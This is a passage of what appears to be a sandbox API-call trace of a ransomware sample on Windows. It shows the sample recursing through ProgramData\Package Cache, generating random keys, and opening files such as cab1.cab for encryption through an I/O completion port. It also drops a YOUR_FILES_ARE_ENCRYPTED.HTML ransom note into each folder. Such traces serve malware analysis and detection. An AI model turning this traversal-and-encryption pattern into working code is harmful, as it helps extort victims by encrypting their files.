(in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359dcc70, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359dcc70, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x3d0955b0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0158.223] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\state.rsm") returned 81 [0158.223] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.223] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.223] lstrlenW (lpString=".rsm") returned 4 [0158.224] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.224] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359b6b10, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x2e940a70, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x9e2e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0158.224] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\VC_redist.x86.exe") returned 89 [0158.224] lstrcmpW (lpString1="VC_redist.x86.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.224] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0158.224] lstrlenW (lpString=".exe") returned 4 [0158.224] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0158.224] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359b6b10, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x2e940a70, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x9e2e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0 [0158.224] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.224] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0158.224] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.228] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.230] CloseHandle (hObject=0x58c) returned 1 [0158.231] GetProcessHeap () returned 0x270000 [0158.232] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.232] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0158.232] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 82 [0158.232] GetProcessHeap () returned 0x270000 [0158.232] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.232] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0158.232] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*" [0158.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.233] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.233] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0158.233] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned 91 [0158.233] GetProcessHeap () returned 0x270000 [0158.233] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0158.233] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0158.233] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*" [0158.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0158.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99d3130, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99d3130, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0158.234] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned 115 [0158.234] GetProcessHeap () returned 0x270000 [0158.234] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0158.237] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0158.237] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*" [0158.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99d3130, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99d3130, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0158.237] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99d3130, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99d3130, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.237] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa960e00, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xfa960e00, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xfa960e00, ftLastWriteTime.dwHighDateTime=0x1ced524, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0158.237] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0158.237] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.237] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.237] lstrlenW (lpString=".cab") returned 4 [0158.237] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.237] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0158.238] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0158.238] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=5153816) returned 1 [0158.238] GetProcessHeap () returned 0x270000 [0158.238] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0158.244] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="AD") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="79") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="7E") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="1F") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="B7") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="62") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="8B") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="CE") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="AF") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="E4") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="8C") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="00") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="18") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="BD") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="D3") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="79") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="73") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="0C") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="62") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A1") returned 2 [0158.244] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="43") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="42") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="B8") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="12") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="4A") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="CB") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AD") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="E2") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="99") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C8") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="09") returned 2 [0158.245] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="58") returned 2 [0158.246] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0158.246] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0158.246] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0158.246] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0158.246] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0158.246] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.246] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0158.246] lstrlenW (lpString=".msi") returned 4 [0158.246] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0158.246] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0158.246] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0158.247] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0158.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0158.477] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0158.480] CloseHandle (hObject=0x4a8) returned 1 [0158.481] GetProcessHeap () returned 0x270000 [0158.482] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0158.482] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99d3130, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99d3130, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0158.482] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0158.483] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0158.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0158.483] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0158.486] CloseHandle (hObject=0x598) returned 1 [0158.486] GetProcessHeap () returned 0x270000 [0158.487] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0158.487] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0158.487] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.488] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0158.488] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.488] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.491] CloseHandle (hObject=0x58c) returned 1 [0158.491] GetProcessHeap () returned 0x270000 [0158.492] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.498] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0158.498] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 